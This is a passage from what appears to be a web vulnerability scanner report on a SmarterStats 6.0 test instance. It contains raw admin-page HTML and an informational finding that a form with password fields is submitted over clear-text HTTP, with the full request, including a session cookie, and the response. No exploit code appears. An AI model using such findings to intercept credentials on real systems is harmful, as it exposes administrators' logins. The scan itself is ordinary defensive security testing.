           <div id="ctl00_TitleBar_HeaderPanel" class="PageTitle">
               <div class="RoundedPageTitleLeft">
                   <div id="PageTitle" class="PageTitleText">
                       Email Settings
                   </div>
               </div>
           </div>
       
       <div id="ctl00_ButtonRow" class="ButtonBar">
           <div class="ButtonBarLeft">
               
   <div id="ctl00_BPH_btnSave" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick=" __doPostBack('ctl00$BPH$btnSave',''); return false;"><span class="BBInner">Save</span></a></div>
   <div id="ctl00_BPH_btnTest" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick=" __doPostBack('ctl00$BPH$btnTest',''); return false;"><span class="BBInner">Test Connection</span></a></div>

           </div>
           <div class="ButtonBarRight">
               
           </div>
           <div class="ButtonBarClear">
               <div class="ie6fix">
                   &nbsp;</div>
           </div>
       </div>
       
       
       
       <span id="ctl00_UpdatePanel1">
               
           </span>
       
       <div id="Scrollable" class="ContentDiv">
           
   <div id="ctl00_MPH_UpdatePanel1">
   
           <table class="SettingsContainer SCMarginTop" border="0">
       <tr id="ctl00_MPH_txtFromAddress">
           <td id="ctl00_MPH_txtFromAddress_Label" class="Indent Fixed">Email Address</td><td id="ctl00_MPH_txtFromAddress_Setting" class="Setting"><input name="ctl00$MPH$txtFromAddress_SettingText" type="text" value="someone@yourdomain.com" size="40" id="ctl00_MPH_txtFromAddress_SettingText" class="text" /></td>
       </tr><tr id="ctl00_MPH_txtSMTPServer">
           <td id="ctl00_MPH_txtSMTPServer_Label" class="Indent Fixed">SMTP Server</td><td id="ctl00_MPH_txtSMTPServer_Setting" class="Setting"><input name="ctl00$MPH$txtSMTPServer_SettingText" type="text" value="vulnerable.smarterstats.6.0.host" size="40" id="ctl00_MPH_txtSMTPServer_SettingText" class="text" /></td>
       </tr><tr id="ctl00_MPH_chkSMTPAuthentication">
           <td id="ctl00_MPH_chkSMTPAuthentication_Label" class="Indent Fixed"></td><td id="ctl00_MPH_chkSMTPAuthentication_Setting" class="Setting"><input id="ctl00_MPH_chkSMTPAuthentication_SettingCheck" type="checkbox" name="ctl00$MPH$chkSMTPAuthentication_SettingCheck" /><label for="ctl00_MPH_chkSMTPAuthentication_SettingCheck">Enable SMTP authentication</label></td>
       </tr><tr id="ctl00_MPH_txtAuthUsername">
           <td id="ctl00_MPH_txtAuthUsername_Label" class="Indent Fixed">Auth Username</td><td id="ctl00_MPH_txtAuthUsername_Setting" class="Setting"><input name="ctl00$MPH$txtAuthUsername_SettingText" type="text" id="ctl00_MPH_txtAuthUsername_SettingText" class="text" /></td>
       </tr><tr id="ctl00_MPH_txtAuthPassword">
           <td id="ctl00_MPH_txtAuthPassword_Label" class="Indent Fixed">Auth Password</td><td id="ctl00_MPH_txtAuthPassword_Setting" class="Setting"><input name="ctl00$MPH$txtAuthPassword_SettingText" type="password" id="ctl00_MPH_txtAuthPassword_SettingText" class="text" autocomplete="off" /></td>
       </tr>
   </table>
       
</div>

       </div>
       
       
       <div id="ctl00_Footer" class="Footer">
           <div class="FooterNav">
               
           </div>
           <div class="FooterSummary">
               
           </div>
       </div>

       <script type="text/javascript">
           document.ResizeEvent = function() { $('#Scrollable').ResizeToFit(); }
           var searchId = 'ctl00_SearchRow';
           if (parent.HelpPageID) parent.HelpPageID('admin/frmemailreportsettings', '');
           $(function() {
               if (parent.DoneLoading) parent.DoneLoading();
               InitAjaxHandlers();
               RegisterResizeEvent();
           });
       </script>

       
   

<script type="text/javascript">
//<![CDATA[
$(function() { if (parent.UpdateCurrentPage) parent.UpdateCurrentPage('\x2fAdmin\x2ffrmEmailReportSettings\x2easpx?'); });
$('#ctl00_MPH_txtAuthPassword_SettingText').val('');
$(function() { SetTopTitle('Email\x20Settings'); });
modules['vmNotBlank_txt']='Must have a value';
modules['vmEmail_txt']='Must be an email address';
$(function() {$vc({"lt":"Email Address","vcID":"ctl00_MPH_txtFromAddress_SettingText","VMs":["vmNotBlank","vmEmail"],"VPs":{"vmRequired":true}},false);});
$(function() {$vc({"lt":"SMTP Server","vcID":"ctl00_MPH_txtSMTPServer_SettingText","VMs":["vmNotBlank"],"VPs":{"vmRequired":true}},false);});
modules['vmOptional_txt']='Value is optional';
modules['vmRequiredIfChecked_txt']='Must have a value if enabled';
$(function() {$vc({"lt":"Auth Username","vcID":"ctl00_MPH_txtAuthUsername_SettingText","VMs":["vmOptional","vmRequiredIfChecked"],"VPs":{"vmRequiredCheckbox":"ctl00_MPH_chkSMTPAuthentication_SettingCheck","vmRequired":false}},false);});
$(function() {$vc({"lt":"Auth Password","vcID":"ctl00_MPH_txtAuthPassword_SettingText","VMs":["vmRequiredIfChecked"],"VPs":{"vmRequiredCheckbox":"ctl00_MPH_chkSMTPAuthentication_SettingCheck","vmRequired":false}},false);});
//]]>
</script>
</form>
</body>
</html>


4.2. http://vulnerable.smarterstats.6.0.host:9999/Admin/frmGeneralSettings.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Admin/frmGeneralSettings.aspx

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password fields:

Request

GET /Admin/frmGeneralSettings.aspx HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Proxy-Connection: keep-alive
Referer: http://vulnerable.smarterstats.6.0.host:9999/default.aspx
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; SelectedLanguage=; STHashCookie={"CountsGuid":"1413386179","TopBarSection":"AdminSettings"}; STTTState=

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 03:32:31 GMT
X-AspNet-Version: 4.0.30319
X-Compressed-By: HttpCompress
Cache-Control: private
Content-Type: text/html; charset=utf-8
Connection: Close
Content-Length: 20864



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
   General Settings - SmarterStats
</title><meta http-equiv="Page-Enter" content="blendTrans(Duration=0)" /><meta http-equiv="Page-Exit" content="blendTrans(Duration=0)" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Main/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Stats/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Telerik&amp;rtl=false" rel="stylesheet" type="text/css" />
<!--[if lte IE 6]>
<style type="text/css">@import '/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&fileMask=BrowserOverrides/ie6&rtl=false';</style>
<![endif]-->
</head>
<body class="" dir="ltr">
   <form name="aspnetForm" method="post" action="frmGeneralSettings.aspx" id="aspnetForm">
<div>
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwULLTIwOTA5ODE0NDIPFgQeEF9fX1Jlc3VsdEZhaWx1cmVlHhBfX19SZXN1bHRTdWNjZXNzZRYCZg9kFgICAQ9kFggCBA8WBB4Fc3R5bGUFDWRpc3BsYXk6bm9uZTseB1Zpc2libGVoZAIGDxYCHwNoZAIHD2QWAmYPZBYCAgEPFgIfA2gWAgIBDxYCHgRUZXh0ZWQCCQ9kFgICAQ9kFgJmD2QWAgIBD2QWBgICD2QWAgIBD2QWBGYPZBYCAgEPZBYCZg8QZA8WBmYCAQICAgMCBAIFFgYQBQIxMAUCMTBnEAUCMjUFAjI1ZxAFAzEwMAUDMTAwZxAFAzUwMAUDNTAwZxAFBDEwMDAFBDEwMDBnEAUDQWxsBQEwZ2RkAgEPZBYCAgEPZBYCZg8QZBAVAQdEZWZhdWx0FQEHRGVmYXVsdBQrAwFnZGQCBA9kFgICAQ9kFggCAQ9kFgICAQ9kFgICAg8PFgIfBAUFYWRtaW5kZAICD2QWAgIBD2QWAmYPD2QWAh4MYXV0b2NvbXBsZXRlBQNvZmZkAgMPZBYCAgEPZBYCZg8PZBYCHwUFA29mZmQCBA9kFgICAQ9kFgJmDw9kFgIfBQUDb2ZmZAIGD2QWAgIBD2QWBGYPZBYCAgEPZBYCAgIPDxYCHwQFGWFkbWluaXN0cmF0b3JAZXhhbXBsZS5jb21kZAIBD2QWAgIBD2QWAgICDw8WAh8EBQkxMjcuMC4wLjFkZBgEBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WBAUgY3RsMDAkTVBIJGNoa0VuYWJsZV9TZXR0aW5nQ2hlY2sFMmN0bDAwJE1QSCRjaGtFbmFibGVBdXRvUmVtaW5kZXJQb3B1cHNfU2V0dGluZ0NoZWNrBS1jdGwwMCRNUEgkY2hrUmVzZXRHZXR0aW5nU3RhcnRlZF9TZXR0aW5nQ2hlY2sFLmN0bDAwJE1QSCRjaGtQcm9ibGVtRW1haWxzRW5hYmxlZF9TZXR0aW5nQ2hlY2sFJmN0bDAwJFRQSCRIeXBlclRhYlN0cmlwMSRIeXBlclRhYkl0ZW0yDzLwCwABAAAA/////wEAAAAAAAAABAEAAADiAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLkRpY3Rpb25hcnlgMltbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0EAAAAB1ZlcnNpb24IQ29tcGFyZXIISGFzaFNpemUNS2V5VmFsdWVQYWlycwADAAMIkgFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5HZW5lcmljRXF1YWxpdHlDb21wYXJlcmAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQjmAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLktleVZhbHVlUGFpcmAyW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXVtdBQAAAAkCAAAABwAAAAkDAAAABAIAAACSAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLkdlbmVyaWNFcXVhbGl0eUNvbXBhcmVyYDFbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dAAAAAAcDAAAAAAEAAAAFAAAAA+QBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuS2V5VmFsdWVQYWlyYDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dBPz////kAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLktleVZhbHVlUGFpcmAyW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQIAAAADa2V5BXZhbHVlAQIGBQAAAAdFbmFibGVkCAEBAfr////8////BgcAAAAEVGV4dAoB+P////z///8GCQAAAApSZXNvdXJjZUlEBgoAAAAVQEFkbWluaXN0cmF0aXZlRW1haWxzAfX////8////BgwAAAAIU2VsZWN0ZWQIAQAB8/////z///8GDgAAAApQYWdlVmlld0lEBg8AAAAXQWRtaW5pc3RyYXRpdmVFbWFpbHNUYWILZAUmY3RsMDAkVFBIJEh5cGVyVGFiU3RyaXAxJEh5cGVyVGFiSXRlbTEPMugLAAEAAAD/////AQAAAAAAAAAEAQAAAOIBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuRGljdGlvbmFyeWAyW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQQAAAAHVmVyc2lvbghDb21wYXJlcghIYXNoU2l6ZQ1LZXlWYWx1ZVBhaXJzAAMAAwiSAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLkdlbmVyaWNFcXVhbGl0eUNvbXBhcmVyYDFbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dCOYBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuS2V5VmFsdWVQYWlyYDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dW10FAAAACQIAAAAHAAAACQMAAAAEAgAAAJIBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuR2VuZXJpY0VxdWFsaXR5Q29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0AAAAABwMAAAAAAQAAAAUAAAAD5AFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5LZXlWYWx1ZVBhaXJgMltbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0E/P///+QBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuS2V5VmFsdWVQYWlyYDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dAgAAAANrZXkFdmFsdWUBAgYFAAAAB0VuYWJsZWQIAQEB+v////z///8GBwAAAARUZXh0CgH4/////P///wYJAAAAClJlc291cmNlSUQGCgAAABRAU3lzdGVtQWRtaW5pc3RyYXRvcgH1/////P///wYMAAAACFNlbGVjdGVkCAEAAfP////8////Bg4AAAAKUGFnZVZpZXdJRAYPAAAAEEFkbWluaXN0cmF0b3JUYWILZAUmY3RsMDAkVFBIJEh5cGVyVGFiU3RyaXAxJEh5cGVyVGFiSXRlbTMPMt4LAAEAAAD/////AQAAAAAAAAAEAQAAAOIBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuRGljdGlvbmFyeWAyW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQQAAAAHVmVyc2lvbghDb21wYXJlcghIYXNoU2l6ZQ1LZXlWYWx1ZVBhaXJzAAMAAwiSAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLkdlbmVyaWNFcXVhbGl0eUNvbXBhcmVyYDFbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dCOYBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuS2V5VmFsdWVQYWlyYDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dW10FAAAACQIAAAAHAAAACQMAAAAEAgAAAJIBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuR2VuZXJpY0VxdWFsaXR5Q29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0AAAAABwMAAAAAAQAAAAUAAAAD5AFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5LZXlWYWx1ZVBhaXJgMltbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0E/P///+QBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuS2V5VmFsdWVQYWlyYDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dAgAAAANrZXkFdmFsdWUBAgYFAAAAB0VuYWJsZWQIAQEB+v////z///8GBwAAAARUZXh0CgH4/////P///wYJAAAAClJlc291cmNlSUQGCgAAAAxAV2ViU2V0dGluZ3MB9f////z///8GDAAAAAhTZWxlY3RlZAgBAAHz/////P///wYOAAAAClBhZ2VWaWV3SUQGDwAAAA5XZWJTZXR0aW5nc1RhYgtklPiHCE61VFTrgRRe4mkfDXl3QxjZO+wxOsGYV3ev7iA=" />
</div>

<script type="text/javascript">
//<![CDATA[
var theForm = document.forms['aspnetForm'];
if (!theForm) {
theForm = document.aspnetForm;
}
function __doPostBack(eventTarget, eventArgument) {
if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
theForm.__EVENTTARGET.value = eventTarget;
theForm.__EVENTARGUMENT.value = eventArgument;
theForm.submit();
}
}
//]]>
</script>


<script src="/WebResource.axd?d=b4Jug36ostX8XpQPkbGPZnB5weIJ8ZhZWVxc7eQ0ErH5Oqh2t7zqRaCIeIS69x83_6q-tRLaOXFfET7Z4zgwqpHnbsUcPkzlnuvFKsw3eu81&amp;t=634219308989960000" type="text/javascript"></script>


<script src="/ScriptResource.axd?d=2bJwBbBp-LjjroY_H--VfKxBI87QDMTJoxT55-6osUp4RWW1XG1VkdIsr1dLpsXsDtz8rHnzmIdXh-thDZxEdmifJ63O4K0Ln24KmulPk_iWRXYrxybK2sY_DVczrGLpqznYqYTd5E_dM3cytQJ6pstxS02nHoJt-ud1VYnn_Dw1&amp;t=2610f696" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=A9pC7Zm-KCpQcgrv_k8kri_gOPHbfERI0dufcaagWzEba-1yxTkhsaFA2m9iF-X5YqK0XNPqsFxLS_SFDYkSVh9nUPFqs2OyCDrKdTfvfrMuUlk67QCsv25m8qReQpSVlXorL9IfscXz2o8ZMhLIvvadK3tiZWlccHVt2Ooi2hhOsVAvQO2j3e4BUVWja_ET0&amp;t=2610f696" type="text/javascript"></script>

       <script type="text/javascript">
           self.EnableAnimations = true;
       </script>

       <script type="text/javascript" src="/App_Themes/Default/Javascript/JavaScript.ashx?guid=1CB66497A424400_1.6.3932.23374_&fileMask="></script>
       <script type="text/javascript">
//<![CDATA[
Sys.WebForms.PageRequestManager._initialize('ctl00$ScriptManager1', 'aspnetForm', ['tctl00$UpdatePanel1','','tctl00$MPH$UpdatePanel1',''], ['ctl00$BPH$btnSave',''], [], 90, 'ctl00');
//]]>
</script>

       
           <div id="ctl00_TitleBar_HeaderPanel" class="PageTitle">
               <div class="RoundedPageTitleLeft">
                   <div id="PageTitle" class="PageTitleText">
                       General Settings
                   </div>
               </div>
           </div>
       
       <div id="ctl00_ButtonRow" class="ButtonBar">
           <div class="ButtonBarLeft">
               
<div id="ctl00_BPH_btnSave" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick=" __doPostBack('ctl00$BPH$btnSave',''); return false;"><span class="BBInner">Save</span></a></div>

           </div>
           <div class="ButtonBarRight">
               
           </div>
           <div class="ButtonBarClear">
               <div class="ie6fix">
                   &nbsp;</div>
           </div>
       </div>
       
       
       
       <span id="ctl00_UpdatePanel1">
               
           </span>
       <div id="ctl00_trTabStrip" class="TabStripContainer">
           

<!-- HyperTabStrip -->
<div class='htsTabStrip htsTabBar'><ul id='ctl00_TPH_HyperTabStrip1'>
   <li class='htsItem htsFirst htsSelected' id='ctl00_TPH_HyperTabStrip1_HyperTabItem3'><a class='htsA' href='#'><span class='htsOuter'><span class='htsInner'>Web Settings</span></span></a></li>
   <li class='htsItem ' id='ctl00_TPH_HyperTabStrip1_HyperTabItem1'><a class='htsA' href='#'><span class='htsOuter'><span class='htsInner'>System Administrator</span></span></a></li>
   <li class='htsItem htsLast' id='ctl00_TPH_HyperTabStrip1_HyperTabItem2'><a class='htsA' href='#'><span class='htsOuter'><span class='htsInner'>Administrative Emails</span></span></a></li>
</ul>
<input type="hidden" name="ctl00$TPH$HyperTabStrip1$SelectedTab" id="ctl00_TPH_HyperTabStrip1_SelectedTab" value="ctl00_TPH_HyperTabStrip1_HyperTabItem3" /><div class='htsClear'><div class='ie6fix'>&nbsp;</div></div></div>


       </div>
       <div id="Scrollable" class="ContentDiv">
           
<div id="ctl00_MPH_UpdatePanel1">
   

<!-- HyperMultiPage -->
   <div class='' id='ctl00_MPH_MP1'>
       <input type="hidden" name="ctl00$MPH$VisiblePage" id="ctl00_MPH_VisiblePage" value="ctl00_MPH_WebSettingsTab" />

<div id='ctl00_MPH_WebSettingsTab' class='' >
           <span id="ctl00_MPH_WebSettingsTab">
<table id="ctl00_MPH_Table1" class="SettingsContainer" border="0">
               <tr id="ctl00_MPH_lstRows">
                   <td id="ctl00_MPH_lstRows_Label" class="Indent Fixed">Rows per Page</td><td id="ctl00_MPH_lstRows_Setting" class="Setting"><select name="ctl00$MPH$lstRows_SettingDropDown" id="ctl00_MPH_lstRows_SettingDropDown">
                       <option value="10">10</option>
                       <option selected="selected" value="25">25</option>
                       <option value="100">100</option>
                       <option value="500">500</option>
                       <option value="1000">1000</option>
                       <option value="0">All</option>

                   </select></td>
               </tr><tr id="ctl00_MPH_lstSkins">
                   <td id="ctl00_MPH_lstSkins_Label" class="Indent Fixed">Default Skin</td><td id="ctl00_MPH_lstSkins_Setting" class="Setting"><select name="ctl00$MPH$lstSkins_SettingDropDown" id="ctl00_MPH_lstSkins_SettingDropDown">
                       <option value="Default">Default</option>

                   </select></td>
               </tr><tr id="ctl00_MPH_chkEnable">
                   <td id="ctl00_MPH_chkEnable_Label" class="Indent Fixed"></td><td id="ctl00_MPH_chkEnable_Setting" class="Setting"><input id="ctl00_MPH_chkEnable_SettingCheck" type="checkbox" name="ctl00$MPH$chkEnable_SettingCheck" /><label for="ctl00_MPH_chkEnable_SettingCheck">Enable users to override skin</label></td>
               </tr><tr id="ctl00_MPH_chkEnableAutoReminderPopups">
                   <td id="ctl00_MPH_chkEnableAutoReminderPopups_Label" class="Indent Fixed"></td><td id="ctl00_MPH_chkEnableAutoReminderPopups_Setting" class="Setting"><input id="ctl00_MPH_chkEnableAutoReminderPopups_SettingCheck" type="checkbox" name="ctl00$MPH$chkEnableAutoReminderPopups_SettingCheck" checked="checked" /><label for="ctl00_MPH_chkEnableAutoReminderPopups_SettingCheck">Enable automatic reminder popups</label></td>
               </tr><tr id="ctl00_MPH_chkResetGettingStarted">
                   <td id="ctl00_MPH_chkResetGettingStarted_Label" class="Indent Fixed"></td><td id="ctl00_MPH_chkResetGettingStarted_Setting" class="Setting"><input id="ctl00_MPH_chkResetGettingStarted_SettingCheck" type="checkbox" name="ctl00$MPH$chkResetGettingStarted_SettingCheck" /><label for="ctl00_MPH_chkResetGettingStarted_SettingCheck">Reset getting started</label></td>
               </tr>
           </table>
</span></div>
       

<div id='ctl00_MPH_AdministratorTab' class='' style='display:none'>
           <span id="ctl00_MPH_AdministratorTab">
<table id="ctl00_MPH_tblOptions" class="SettingsContainer" border="0">
               <tr id="ctl00_MPH_lblSiteID">
                   <td id="ctl00_MPH_lblSiteID_Label" class="Indent Fixed">Site ID</td><td id="ctl00_MPH_lblSiteID_Setting" class="Setting"><span id="ctl00_MPH_lblSiteID_ReadOnlyLabel">admin</span></td>
               </tr><tr id="ctl00_MPH_txtAdminUsername">
                   <td id="ctl00_MPH_txtAdminUsername_Label" class="Indent Fixed">Username</td><td id="ctl00_MPH_txtAdminUsername_Setting" class="Setting"><input name="ctl00$MPH$txtAdminUsername_SettingText" type="text" value="admin" id="ctl00_MPH_txtAdminUsername_SettingText" class="text" /></td>
               </tr><tr id="ctl00_MPH_txtAdminOldPassword">
                   <td id="ctl00_MPH_txtAdminOldPassword_Label" class="Indent Fixed">Old Password</td><td id="ctl00_MPH_txtAdminOldPassword_Setting" class="Setting"><input name="ctl00$MPH$txtAdminOldPassword_SettingText" type="password" id="ctl00_MPH_txtAdminOldPassword_SettingText" class="text" autocomplete="off" /></td>
               </tr><tr id="ctl00_MPH_txtAdminNewPassword">
                   <td id="ctl00_MPH_txtAdminNewPassword_Label" class="Indent Fixed">New Password </td><td id="ctl00_MPH_txtAdminNewPassword_Setting" class="Setting"><input name="ctl00$MPH$txtAdminNewPassword_SettingText" type="password" id="ctl00_MPH_txtAdminNewPassword_SettingText" class="text" autocomplete="off" /></td>
               </tr><tr id="ctl00_MPH_txtAdminConfirmPassword">
